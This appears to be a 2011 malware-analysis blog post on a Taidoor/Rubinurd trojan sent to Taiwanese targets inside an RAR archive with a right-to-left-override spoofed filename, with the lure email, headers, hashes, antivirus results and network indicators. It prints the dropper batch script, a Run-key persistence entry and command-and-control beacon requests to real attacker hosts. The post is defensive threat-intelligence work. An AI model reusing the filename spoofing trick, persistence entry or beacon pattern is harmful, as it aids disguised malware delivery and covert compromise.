Jul 12 RTLO rar with trojan Taidoor - former President Lee Teng-hui seriously ill

 
I wanted to release this one as part of a pack (several semi related posts together) but seems like it takes too long, so I just post it. This one is not much different from what you saw before, just another taidoor trojan for your collection sent within RTLO rar archive. According to Microsoft Malware Protection Center Trojan Taidoor / Rubinurd is a bot capable to download and upload files to / from the attackers' server, and execute commands on the system. It is prevalent in Taiwan (at least 1/2 of all detections are there) and is relatively new - emerged in September 2010. This is a file sent in Taiwan from a Taiwan server.

Exploit Information

RTLO
More about RTLO is here Right to Left Override unicode can be used for multiple spoofing cases by Jordi Chancel:

"RTLO is a technique exploiting the RIGHT TO LEFT OVERRIDE unicode and than it will always cause the directional reverse reading order of others characters followed it including the extension-type of malicious file! This UNICODE of which we will simplify name by [RTLO] doesnt can see owing to the fact that its characters and its place are invisible. Use RTLO for reverse the direction of reading of the file names including the extension of concerned file while keeping same the types of execution.
Example: To use a syntax like “SexyPictureGirlAl[RTLO]gpj.exe” be read “SexyPictureGirlAlexe.jpg”

TROJAN TAIDOOR/ RUBINURD (as payload)

It produces traffic as below
http://someipordomain/qfgkt.php?id=030696111D308D0E8D
http://aaaaa/bbbbb.php?id=xxxxxxyyyyyyyyyyyy where
aaaaa is a host or domain
bbbbb is a 5 char string
xxxxxx is a 6 char changing string
yyyyyyyyyyyy - 12 char more or less constant string - which is encoded mac address of the system

  General File Information

MD5:7c458a2d76e1270e5add6c0ec8c02815

File Type: scr

MD5 of archive B1497751D08A99181EB981B7110935DC

Distribution: email attachment
Malware: Taidoor / Rubinurd

Right to Left override in action

1) unzipped attachment on Windows with "Hide extensions for known file types" option UNCHECKED 

---

---

2) unzipped attachment on Windows with "Hide extensions for known file types" option CHECKED (more common user option)

Download

Download  as a password protected archive (contact me if you need the password)

Original Message

From: TSU [mailto: kenneth.abbate @ yahoo.com]

Sent: Tuesday, July 12, 2011 9:44 AM
Subject: To Ms. Li Denghui message of condolence issued, please Kam nuclear

 It is reported that former President Lee Teng-hui was seriously ill, as if death, please express their condolences. Once there is a genuine message, to forward to.

Message Headers

Received: (qmail 9874 invoked from network); 12 Jul 2011 13:42:57 -0000
Received: from msr12.hinet.net (HELO msr12.hinet.net) (168.95.4.112)
  byxxxxxxxxxxxxxxxxxx
Received: from test-tw (59-120-229-228.HINET-IP.hinet.net [59.120.229.228])
    (authenticated bits=0)
    by msr12.hinet.net (8.14.2/8.14.2) with ESMTP id p6CDggjD000636
xxxxxxxxxxxxx
Reply-To: bbianshabi@hotmail.com, kenneth.abbate@yahoo.com
From: =?Big5?B?pXjBcA==?=
Subject: =?BIG5?B?rVCn9bVuvfek0qRIrfG5cb1aoUG3cb3QxbOu1g==?=
Date: Tue, 12 Jul 2011 21:44:16 +0800
Message-ID:
MIME-Version: 1.0
Content-Type: multipart/mixed;
    boundary="----=_NextPart_11071111113917301623154_000"
X-DM-IsEditMail: True
X-Priority: 3
X-Mailer: DreamMail 4.6.8.6
Disposition-Notification-To: kenneth.abbate@yahoo.com

Sender

MSG SENDER HOST IP   -
(originating IP / sending server IP)                  
59.120.229.22859-120-229-228.HINET-IP.hinet.net
Host reachable, 242 ms. average

59.120.229.0 - 59.120.229.255

Chunghwa Telecom Data Communication Business Group
Taipei Taiwan
Taiwan

Automated Scans

_________cod.scr
http://www.virustotal.com/file-scan/report.html?id=195d3a0e5c498b2fc092f05520fc8823e12f913d5dc5ba534eee1b67ea2822e6-1311453037#
Result:23/ 43 (53.5%)
-
AntiVir    7.11.12.65    2011.07.23    TR/Spy.88093.1
Antiy-AVL    2.0.3.7    2011.07.23    Trojan/Win32.Sasfis.gen
AVG    10.0.0.1190    2011.07.23    Generic22.CBLL
BitDefender    7.2    2011.07.23    Gen:Trojan.Heur.gqZ@yvLalFaOf
Commtouch    5.3.2.6    2011.07.23    W32/Trojan-Gypikon-based.BA!Maximus
Emsisoft    5.1.0.8    2011.07.23    Backdoor.Win32.Simbot!IK
eTrust-Vet    36.1.8459    2011.07.22    Win32/Fakedoc_i
F-Prot    4.6.2.117    2011.07.23    W32/Trojan-Gypikon-based.BA!Maximus
F-Secure    9.0.16440.0    2011.07.23    Gen:Trojan.Heur.gqZ@yvLalFaOf
GData    22    2011.07.23    Gen:Trojan.Heur.gqZ@yvLalFaOf
Ikarus    T3.1.1.104.0    2011.07.23    Backdoor.Win32.Simbot
Jiangmin    13.0.900    2011.07.23    Trojan/Sasfis.qki
K7AntiVirus    9.108.4937    2011.07.22    Trojan
McAfee    5.400.0.1158    2011.07.23    Generic Dropper.ye
McAfee-GW-Edition    2010.1D    2011.07.23    Heuristic.LooksLike.Win32.Suspicious.J
Microsoft    1.7104    2011.07.23    Backdoor:Win32/Simbot.gen
NOD32    6319    2011.07.23    Win32/TrojanDropper.Agent.PKO
PCTools    8.0.0.5    2011.07.23    Trojan.Gen
Sophos    4.67.0    2011.07.23    Troj/Mdrop-DMI
Symantec    20111.1.0.186    2011.07.23    Trojan.Gen
TheHacker    6.7.0.1.261    2011.07.23    Trojan/Sasfis.bkwo
VBA32    3.12.16.4    2011.07.22    Trojan.Sasfis.blce
VirusBuster    14.0.135.0    2011.07.23    Trojan.Agent!07xHu47lXUs
Additional information
Show all
MD5   : 7c458a2d76e1270e5add6c0ec8c02815

Payload and Traffic

\Local Settings\Temp\~1tmp.bat
\Local Settings\Temp\~dfds3.reg

Local Settings\TlntSvr.exe========================

~dfds3.reg

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"TlntSvr"="C:\\Documents and Settings\\mila\\Local Settings\\TlntSvr.exe"

========================

 ~1tmp.bat
Size: 23215
MD5:  27AE3C32B4D80BCD5A3D69613CB8EAB6

%temp%\~1tmp.bat

File: ~1tmp.bat
Size: 23215
MD5:  27AE3C32B4D80BCD5A3D69613CB8EAB6

@echo off
@echo 123>>~winhp.tmp
@echo 123>>~winhp.tmp
@echo 123>>~winhp.tmp
@echo 123>>~winhp.tmp
@echo 123>>~winhp.tmp
@echo 123>>~winhp.tmp
@echo 123>>~winhp.tmp
..........
@echo 123>>~winhp.tmp
@echo 123>>~winhp.tmp
@echo 123>>~winhp.tmp

@del ~winhp.tmp
del "C:\Documents and Settings\mila\Desktop\ATT07722\?????????cod.scr"
"C:\Documents and Settings\mila\Desktop\ATT07722\.doc"
"C:\DOCUME~1\mila\LOCALS~1\Temp\~1tmp.exe"
del %0
@exit
%temp%\~dfds3.reg

========================
~$.doc
Size: 162
MD5:  4DD8A05B976BF586A9ACC126E985B252

========================

 ~winhp.tmp
Size: 5000
MD5:  D679CFCD2096E351DBBBB968B52B6C3C

contents are :

123
123
123
123
123
123
123
123
123
123

 TlntSvr.exe See the full Anubis report here and some details below

http://www.virustotal.com/file-scan/report.html?id=c89abd88d215131e4b3620ea970a2ea2011220899dc89d93eaac56ac2278c523-1311440191
2011-07-23 16:56:31 (UTC)
14 /43 (32.6%)

AhnLab-V3     2011.07.23.00     2011.07.22     Backdoor/Win32.CSon
AVG     10.0.0.1190     2011.07.23     Generic23.BCVQ
BitDefender     7.2     2011.07.23     Trojan.CryptRedol.Gen.3
DrWeb     5.0.2.03300     2011.07.23     Trojan.Taidoor
F-Secure     9.0.16440.0     2011.07.23     Trojan.CryptRedol.Gen.3
GData     22     2011.07.23     Trojan.CryptRedol.Gen.3
Kaspersky     9.0.0.837     2011.07.23     HEUR:Trojan.Win32.Generic
Microsoft     1.7104     2011.07.23     Backdoor:Win32/Simbot.gen
Norman     6.07.10     2011.07.23     W32/Obfuscated.JA
nProtect     2011-07-23.01     2011.07.23     Trojan.CryptRedol.Gen.3
PCTools     8.0.0.5     2011.07.23     Downloader.Generic
Rising     23.67.04.03     2011.07.22     Suspicious
Symantec     20111.1.0.186     2011.07.23     Downloader
VBA32     3.12.16.4     2011.07.22     TrojanDownloader.Rubinurd.f
MD5   : e38f3b357813dd2181f22ea68726e1b8

============================

GET /zpmbl.php?id=029510111F1DC89944 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: abianshabi.myDDNS.com
Connection: Keep-Alive
Cache-Control: no-cache
 HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/5.0


DNS Queries:      
Name     Query Type     Query Result     Successful     Protocol
abianshabi.myddns.com      DNS_TYPE_A      203.90.100.21      YES      udp


Traffic to the following destinations
203.90.100.21:443

203.90.100.21
Host reachable, 335 ms. average
203.90.64.0 - 203.90.127.255
HCL Infinet Limited
E-4,5,6 Sector XI
Noida - 201 301, India
India

222.101.218.86:443
222.101.218.86
Host reachable, 291 ms. average
222.96.0.0 - 222.127.255.255
KOREA TELECOM
Network Management Center
Korea, Republic of
Dong-Joo Lee
128-9 Yeong-Dong Jongro-Ku Seoul
Network Management Center
phone: +82-2-766-1407
fax: +82-2-766-6008
abuse@kornet.net

119.73.230.3:80
119.73.230.3:443
119.73.230.3:8080

119.73.230.3
119.73.230.0 - 119.73.230.15
MCMERHONS PTE LTD
21 BUKIT BATOK CRESCENT #06-77
WCEGA TOWER
Singapore 658065
Singapore
darrenlim@mcmerhons.com

State: Normal establishment and termination - Transferred outbound Bytes: 196 - Transferred inbound Bytes: 0
Data sent:

   
4745 5420 2f7a 706d 626c 2e70 6870 3f69    GET /zpmbl.php?i
643d 3030 3039 3235 3131 3146 3144 4338    d=000925111F1DC8
3939 3434 2048 5454 502f 312e 310d 0a55    9944 HTTP/1.1..U
7365 722d 4167 656e 743a 204d 6f7a 696c    ser-Agent: Mozil
6c61 2f34 2e30 2028 636f 6d70 6174 6962    la/4.0 (compatib
6c65 3b20 4d53 4945 2036 2e30 3b20 5769    le; MSIE 6.0; Wi
6e64 6f77 7320 4e54 2035 2e31 3b20 5356    ndows NT 5.1; SV
3129 0d0a 486f 7374 3a20 6162 6961 6e73    1)..Host: abians
6861 6269 2e6d 7944 444e 532e 636f 6d0d    habi.myDDNS.com.
0a43 6f6e 6e65 6374 696f 6e3a 204b 6565    .Connection: Kee
702d 416c 6976 650d 0a43 6163 6865 2d43    p-Alive..Cache-C
6f6e 7472 6f6c 3a20 6e6f 2d63 6163 6865    ontrol: no-cache
0d0a 0d0a                                  ....

222.101.218.86:443
State: Normal establishment and termination - Transferred outbound Bytes: 189 - Transferred inbound Bytes: 0
Data sent:

   
4745 5420 2f7a 706d 626c 2e70 6870 3f69    GET /zpmbl.php?i
643d 3031 3830 3733 3131 3146 3144 4338    d=018073111F1DC8
3939 3434 2048 5454 502f 312e 310d 0a55    9944 HTTP/1.1..U
7365 722d 4167 656e 743a 204d 6f7a 696c    ser-Agent: Mozil
6c61 2f34 2e30 2028 636f 6d70 6174 6962    la/4.0 (compatib
6c65 3b20 4d53 4945 2036 2e30 3b20 5769    le; MSIE 6.0; Wi
6e64 6f77 7320 4e54 2035 2e31 3b20 5356    ndows NT 5.1; SV
3129 0d0a 486f 7374 3a20 3232 322e 3130    1)..Host: 222.10
312e 3231 382e 3836 0d0a 436f 6e6e 6563    1.218.86..Connec
7469 6f6e 3a20 4b65 6570 2d41 6c69 7665    tion: Keep-Alive
0d0a 4361 6368 652d 436f 6e74 726f 6c3a    ..Cache-Control:
206e 6f2d 6361 6368 650d 0a0d 0a            no-cache....

222.101.218.86:443
State: Normal establishment and termination - Transferred outbound Bytes: 189 - Transferred inbound Bytes: 0
Data sent:
   
4745 5420 2f64 6565 6776 2e70 6870 3f69    GET /deegv.php?i
643d 3031 3034 3338 3131 3146 3144 4338    d=010438111F1DC8
3939 3434 2048 5454 502f 312e 310d 0a55    9944 HTTP/1.1..U
7365 722d 4167 656e 743a 204d 6f7a 696c    ser-Agent: Mozil
6c61 2f34 2e30 2028 636f 6d70 6174 6962    la/4.0 (compatib
6c65 3b20 4d53 4945 2036 2e30 3b20 5769    le; MSIE 6.0; Wi
6e64 6f77 7320 4e54 2035 2e31 3b20 5356    ndows NT 5.1; SV
3129 0d0a 486f 7374 3a20 3232 322e 3130    1)..Host: 222.10
312e 3231 382e 3836 0d0a 436f 6e6e 6563    1.218.86..Connec
7469 6f6e 3a20 4b65 6570 2d41 6c69 7665    tion: Keep-Alive
0d0a 4361 6368 652d 436f 6e74 726f 6c3a    ..Cache-Control:
206e 6f2d 6361 6368 650d 0a0d 0a            no-cache....

      -  TCP Connection Attempts:    
to 222.101.218.86:8080
to 119.73.230.3:80
to 119.73.230.3:443
to 119.73.230.3:8080
to 203.90.100.21:8080
to 222.101.218.86:8080